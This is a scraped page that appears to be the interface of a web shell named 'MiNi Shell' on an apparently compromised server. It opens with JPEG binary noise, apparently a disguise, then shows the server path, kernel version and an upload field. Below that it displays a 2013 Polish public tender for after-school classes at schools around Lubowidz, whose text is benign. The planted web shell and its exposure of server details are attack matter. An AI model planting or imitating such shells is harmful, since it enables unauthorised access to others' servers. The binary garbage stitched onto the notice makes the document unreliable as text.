JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131031/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131031/446112-N-2013.html

<p class="kh_header"><b>Lubowidz: Przeprowadzenie zajęć dodatkowych dla 199 uczennic i 173 uczniów szkół : Szkoły Podstawowej w Mleczówce, Szkoły Podstawowej w Sinogórze, Zespołu Szkół w Syberii (Szkoła Podstawowa i Gimnazjum), Zespołu Szkół w Zieluniu (Szkoła Podstawowa i Gimnazjum) oraz Gimnazjum w Lubowidzu w ramach projektu Szkoła Równych Szans Programy Rozwojowe Szkół - V edycja</b><br>
<b>Numer ogłoszenia: 446112 - 2013; data zamieszczenia: 31.10.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Obsługi Ekonomiczno-Administracyjnej w Lubowidzu , Ul. Zielona 10, 09-304 Lubowidz, woj. mazowieckie, tel. 23 658 20 78, faks 23 658 20 20.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.uglubowidz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie zajęć dodatkowych dla 199 uczennic i 173 uczniów szkół : Szkoły Podstawowej w Mleczówce, Szkoły Podstawowej w Sinogórze, Zespołu Szkół w Syberii (Szkoła Podstawowa i Gimnazjum), Zespołu Szkół w Zieluniu (Szkoła Podstawowa i Gimnazjum) oraz Gimnazjum w Lubowidzu w ramach projektu Szkoła Równych Szans Programy Rozwojowe Szkół - V edycja.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I	Zajęcia matematyczne dla uczniów Szkoły Podstawowej w Mleczówce mających problemy z matematyką w wymiarze 1 godziny tygodniowo - 38 godzin, 
Część II	Przeprowadzenie zajęć korektywy dla uczniów Szkoły Podstawowej w Mleczówce - 38 godzin (rok 2013 - 18 godzin, rok 2014 - 20 godzin)
Część III	Nauka pływania dla uczniów Szkoły Podstawowej w Mleczówce 20 godzin na basenie ( rok 2013 - 10 godzin, rok 2014 - 10 godzin) - koszty wstępu uczniów na basen pokrywa Zamawiający)
Część IV	Przeprowadzenie zajęć z języka polskiego dla uczniów Szkoły Podstawowej w Mleczówce z przejawami dysleksji rozwojowej w wymiarze 1 godziny tygodniowo - 38 godzin (rok 2013 - 18 godzin, rok 2014 - 20 godzin)
Część V	Zajęcia przyrodniczo- ekologiczne  dla uczniów Szkoły Podstawowej w Mleczówce- 54 godziny (rok 2013 - 0 godzin, rok 2014 - 54 godziny prowadzone podczas 7 dniowego wyjazdu w góry - transport, zakwaterowanie oraz wyżywienie dla uczestników oraz  1 osoby skierowanej ze strony Wykonawcy do realizacji zajęć zapewnia Zamawiający)
Część VI	Przeprowadzenie zajęć z języka polskiego dla uczniów Szkoły Podstawowej w Sinogórze z przejawami dysleksji rozwojowej w wymiarze 1 godziny tygodniowo - 40 godzin (rok 2013 - 16 godzin, rok 2014 - 24 godziny),
Część VII	Przeprowadzenie zajęć przyrodniczych dla uczniów Szkoły Podstawowej w Sinogórze prowadzone  w wymiarze 2 godzin tygodniowo - 80 godzin (rok 2013 - 32 godziny, rok 2014 - 48 godzin),
Część VIII	Przeprowadzenie zajęć rekreacyjno- sportowych prowadzone dla uczniów Szkoły Podstawowej w Sinogórze w wymiarze 2 godzin tygodniowo - 80 godzin (rok 2013 - 32 godziny, rok 2014 - 48 godzin),
Część IX	Przeprowadzenie zajęć chemiczno- ekologicznych dla uczniów Gimnazjum w Lubowidzu - 30 godzin (rok 2013 - 15 godzin, rok 2014 - 15 godzin),
Część X	Przeprowadzenie zajęć fizyczno- technicznych dla uczniów Gimnazjum w Lubowidzu - 30 godzin (rok 2013 - 15 godzin, rok 2014 - 15 godzin),
Część XI	Przeprowadzenie zajęć z języka angielskiego dla uczniów Gimnazjum w Lubowidzu dla grupy powyżej 13 osób- 30 godzin-  (rok 2013 - 15 godzin, rok 2014 - 15 godzin prowadzone podczas wyjazdowego obozu zimowego - transport, zakwaterowanie oraz wyżywienie dla uczestników i 1 osoby skierowanej ze strony Wykonawcy do realizacji zajęć zapewnia Zamawiający),
Część XII	Przeprowadzenie zajęć- trening kreatywności dla uczniów Gimnazjum w Lubowidzu - 30 godzin (rok 2013 - 15 godzin, rok 2014 - 15 godzin prowadzone podczas wyjazdowego obozu zimowego -  transport, zakwaterowanie oraz wyżywienie dla uczestników i 1 osoby skierowanej ze strony Wykonawcy do realizacji zajęć zapewnia Zamawiający)
Część XIII	Przeprowadzenie zajęć komputerowych dla uczniów Gimnazjum w Lubowidzu dla grupy powyżej 13 osób- 30 godzin-  (rok 2013 - 15 godzin, rok 2014 - 15 godzin),
Część XIV	Przeprowadzenie zajęć z języka polskiego dla uczniów Gimnazjum w Lubowidzu w wymiarze 2 godzin tygodniowo - 30 godzin (rok 2013 - 15 godzin, rok 2014 - 15 godzin prowadzone podczas wyjazdowego obozu zimowego - transport, zakwaterowanie oraz wyżywienie dla uczestników i 1 osoby skierowanej ze strony Wykonawcy do realizacji zajęć zapewnia Zamawiający),
Część XV	Przeprowadzenie zajęć z W-F  dla uczniów Gimnazjum w Lubowidzu - 45 godzin- (rok 2013 - 22 godziny, rok 2014 - 23 godziny).
Część XVI	Przeprowadzenie zajęć matematycznych dla uczniów  Zespołu Szkół w Syberii  - 60 godzin (rok 2013 - 25 godzin, rok 2014 - 35 godzin, dla uczniów mających problemy z matematyką w wymiarze 1 godziny tygodniowo),
Część XVII	Przeprowadzenie zajęć przyrodniczych  dla uczniów  Zespołu Szkół w Syberii  - 80 godzin (rok 2013 - 25 godzin, rok 2014 - 55 godzin,) w wymiarze 2 godzin tygodniowo,
Część XVIII	Przeprowadzenie zajęć z języka niemieckiego dla uczniów  Zespołu Szkół w Syberii  - 50 godzin (rok 2013 - 25 godzin, rok 2014 - 25 godzin), w wymiarze 2 godzin tygodniowo,
Część XIX	Przeprowadzenie zajęć informatycznych dla uczniów  Zespołu Szkół w Syberii  - 80 godzin (rok 2013 - 25 godzin, rok 2014 - 55 godzin), w wymiarze 2 godzin tygodniowo
Część XX	Przeprowadzenie zajęć dziennikarskich dla uczniów Zespołu Szkół w Zieluniu- 80 godzin  ( 2013 rok- 30 godzin, 2014 rok- 50 godzin), 3 godziny tygodniowo,
Część XXI	Przeprowadzenie zajęć matematycznych dla uczniów Zespołu Szkół w Zieluniu - 80 godzin (rok 2013 - 30 godzin, rok 2014 - 50 godzin), 3 godziny tygodniowo,
Część XXII	Przeprowadzenie zajęć rekreacyjno- sportowych dla uczniów Zespołu Szkół w Zieluniu - 160 godzin (rok 2013 - 60 godzin, rok 2014 - 100 godzin), 4 godziny tygodniowo,
Część XXIII	Przeprowadzenie zajęć przyrodniczych dla uczniów Zespołu Szkół w Zieluniu - 80 godzin (rok 2013- 30 godzin, 2014 rok- 50 godzin),
Część XXIV	Pomoc psychologiczna dla uczniów Zespołu Szkół w Zieluniu- 20 godzin (2013 roku- 10 godzin, 2014 roku- 10 godzin),
Część XXV	Doradztwo zawodowe dla uczniów Zespołu Szkół w Zieluniu - 40 godzin (2013 roku- 10 godzin, 2014 roku- 30 godzin).
Oferta musi obejmować cały zakres zamówienia. Zamawiający nie dopuszcza składania ofert częściowych.
W ramach prowadzenia zajęć, o których mowa w pkt. 1-5 Wykonawca zobowiązany jest również do: 
1)	współpracy z dyrektorem szkoły, opiekunem merytorycznym do spraw programu rozwojowego w danej szkole oraz kierownikiem projektu,
2)	przygotowania w formie pisemnej w terminie 2 dni od daty zawarcia umowy programu i planu pracy zajęć pozalekcyjnych (zajęcia prowadzone mogą być wyłącznie w czasie wolnym od lekcji obowiązkowych) obejmującego harmonogram oraz zakres zadania dla uczestników projektu dla określonego typu zajęć i przedstawienia do akceptacji dyrektorowi szkoły, a następnie opiekunowi merytorycznemu do spraw programu rozwojowego w danej szkole,
3)	realizacji zajęć zgodnie z opracowanym programem zaakceptowanym przez opiekuna merytorycznego do spraw programu rozwojowego w danej szkole,
4)	przekazywania konspektu zajęć opiekunowi merytorycznemu do spraw programu rozwojowego w danej szkole,
5)	realizacji zajęć zgodnie z celem głównym i celami szczegółowymi projektu,
6)	przestrzegania obowiązków, zaleceń i terminów wynikających z realizacji umowy; opieka nad uczniami podczas zajęć, dbanie o bezpieczeństwo uczniów,
7)	wspomagania promocji i ewaluacji projektu- w szczególności informowania  o współfinansowaniu projektu ze środków Europejskiego Funduszu Społecznego oraz współpracy z opiekunem merytorycznym do spraw programu rozwojowego w danej szkole i specjalistą/ką do spraw monitoringu i ewaluacji w mierzeniu postępu uczniów w zakresie rezultatów projektu,
8)	dbałości o stan pomieszczeń, sprzętu i urządzeń wykorzystywanych w trakcie realizacji projektu,
9)	zwiększenia motywacji do nauki przez uczniów uczestniczących w projekcie,
10)	bieżącego monitorowania  efektów zajęć i raportowanie o stanie realizacji zajęć,
11)	rzetelnego prowadzenia dokumentacji z realizowanych zajęć i wyjazdów edukacyjnych, jeśli zajęcia takie wyjazdy przewidują - dzienników zajęć i innych wymaganych dokumentów ( listy obecności, karty czasu pracy, dokumentacji zdjęciowej) 
12)	przygotowania materiałów do przeprowadzenia zajęć we własnym zakresie,
13)	stosowania we wszystkich materiałach logotypów Unii Europejskiej i Programu Operacyjnego Kapitał Ludzki 
14)	informowanie na bieżąco kierownika projektu o wszystkich zaistniałych problemach w realizacji projektu,
15)	informowania opiekuna merytorycznego do spraw programu rozwojowego w danej szkole o każdym przypadku uniemożliwiającym realizację zajęć zgodnie z harmonogramem,
16)	przeniesienia na rzecz zleceniodawcy praw autorskich majątkowych do opracowanych materiałów,
17)	niezwłocznego udostępnienia dokumentacji z zakresu realizacji umowy na żądanie uprawnionemu przedstawicielowi Zamawiającego, opiekunowi merytorycznemu do spraw programu rozwojowego w danej szkole, organowi kontrolującemu,
18)	zaspokojenia potrzeb chłopców i dziewcząt bez ograniczeń wynikających z płci - obowiązek uwzględniania w trakcie zajęć zasady równości szans w przekazywanych treściach.
19)	udostępniania całej dokumentacji z zakresu realizacji umowy (np. prac uczniów wytworzonych w trakcie powadzonych zajęć) na żądanie uprawnionemu przedstawicielowi Zamawiającego, opiekunowi merytorycznemu do spraw programu rozwojowego w danej szkole, organowi kontrolującemu, 
20)	przestrzegania przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. Z 2002 r. Nr 101 poz. 926 z późn. zm.) oraz rozporządzenia Ministra Spraw Wewnętrznych i Administracji z dnia 29 kwietnia 2004 r. w sprawie dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych (Dz. U. Nr 100, poz. 1024), 


Wykonawca ponosi pełną odpowiedzialność za:
1)	bezpieczeństwo uczniów w czasie trwania zajęć
2)	jakość i terminowość prowadzonych zajęć, 
3)	szkody wyrządzone przez swoje działania lub zaniechania podczas wykonywania przedmiotu umowy,
4)	wykorzystanie materiałów dydaktycznych zakupionych przez Zamawiającego, w ramach projektu zgodnie z ich przeznaczeniem oraz dbałość o ich należyty stan, 
5)	należyte utrzymanie stanu nieodpłatnie udostępnionych przed Dyrektora Szkoły pracowni/sali, w której będą prowadzone zajęcia oraz użyczonego do prowadzenia zajęć sprzętu. 

Czas trwania jednej godziny zajęć przewiduje się jako 45 minut nieprzerwanej pracy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca przedstawi:
- oświadczenie w trybie art.22 ust. 1 pkt. 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych. 
Ocena spełniania w/w warunków dokonana zostanie w formule spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu. Z treści dokumentu musi jednoznacznie wynikać, iż Wykonawca spełnia w/w warunki.
.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca przedstawi: 
- oświadczenie w trybie art.22 ust. 1 pkt. 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, oraz
-  wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie , dla:
  
Części: I, II, IV, V, VI, VII, VIII, IX, X, XI, XII, XIII, XIV, XV, XVI, XVII, XVIII, XIX, XX, XXI, XXII, XXIII -   przeprowadził zajęcia lekcyjne o tematyce odpowiadającej  przedmiotowi niniejszego zamówienia, tj. odpowiadające tematyce jednej lub większej liczbie części w  wymiarze nie mniejszym niż 200 godzin lekcyjnych;

Części III -  przeprowadził zajęcia nauki pływania z dziećmi lub młodzieżą w wieku 7- 18 roku życia w wymiarze nie mniejszym niż 20 godzin lekcyjnych;

 Części XXIV - przeprowadził zajęcia z zakresu pomocy psychologicznej dla dzieci lub młodzieży w wieku 7- 18 roku życia w wymiarze nie mniejszym niż  20 godzin lekcyjnych;

 Części XXV  - przeprowadził zajęcia z zakresu doradztwa zawodowego dla dzieci lub młodzieży w wieku 7-18 roku życia w wymiarze nie mniejszym niż  20 godzin lekcyjnych;

Ocena spełniania w/w warunków dokonana zostanie w formule spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu. Z treści dokumentu musi jednoznacznie wynikać, iż Wykonawca spełnia w/w warunki.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca przedstawi: 
- oświadczenie w trybie art.22 ust. 1 pkt. 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych, oraz
Ocena spełniania w/w warunków dokonana zostanie w formule spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu. Z treści dokumentu musi jednoznacznie wynikać, iż Wykonawca spełnia w/w warunki.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca przedstawi: 
- oświadczenie w trybie art. 22 ust. 1 pkt. 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych oraz  
Wykonawca wykaże, że dysponuje lub będzie dysponował, co najmniej jedną osobą do każdej części , która będzie uczestniczyć w wykonywaniu zamówienia, która posiada kwalifikacje nie mniejsze niż :
- Części: I, II, IV, V, VI, VII, VIII, IX, X, XI, XII, XIII, XIV, XV, XVI, XVII, XVIII, XIX, XX, XXI, XXII, XXIII - kwalifikacje do danego rodzaju prowadzonych zajęć zgodnie z Rozporządzeniem Ministra Edukacji Narodowej z dnia 12 marca 2009 r. w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli nie mających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli (Dz. U. z 2009 r. Nr 50, poz.400);
- Części III: posiadać wykształcenie wyższe magisterskie z przygotowaniem pedagogicznym oraz z uprawnieniami instruktora pływania;
- Części XXIV: posiadać wykształcenie wyższe w zakresie psychologii lub wykształcenie wyższe na innym kierunku i studia podyplomowe w zakresie doradztwa zawodowego;
-  Części XXV: posiadać wykształcenie wyższe w zakresie doradztwa zawodowego lub wykształcenie wyższe na innym kierunku i studia podyplomowe w zakresie doradztwa zawodowego
Na potwierdzenie spełniania warunków Wykonawca musi przedstawić oświadczenia, że osoby które będą uczestniczyć w wykonaniu zamówienia posiadają wymagane uprawnienia. 
Ocena spełniania w/w warunków dokonana zostanie w formule spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu. Z treści dokumentu musi jednoznacznie wynikać, iż Wykonawca spełnia w/w warunki.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony, jeżeli wykonawca przedstawi: 
- oświadczenie w trybie art.22 ust. 1 pkt. 1-4 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych.
Ocena spełniania w/w warunków dokonana zostanie w formule spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu. Z treści dokumentu musi jednoznacznie wynikać, iż Wykonawca spełnia w/w warunki.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadku zmiany stawki podatku VAT w trakcie trwania umowy Zamawiający dokona w drodze aneksu uaktualnienia stawki podatku VAT zgodnie z obowiązującą ustawą od towarów i usług. Uaktualniona stawka podatku VAT będzie obowiązywała w dalszej części realizacji zamówienia wynikającej z umowy;  
b) W zakresie terminu realizacji zamówienia, gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należnego wykonania umowy zgodnie z SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
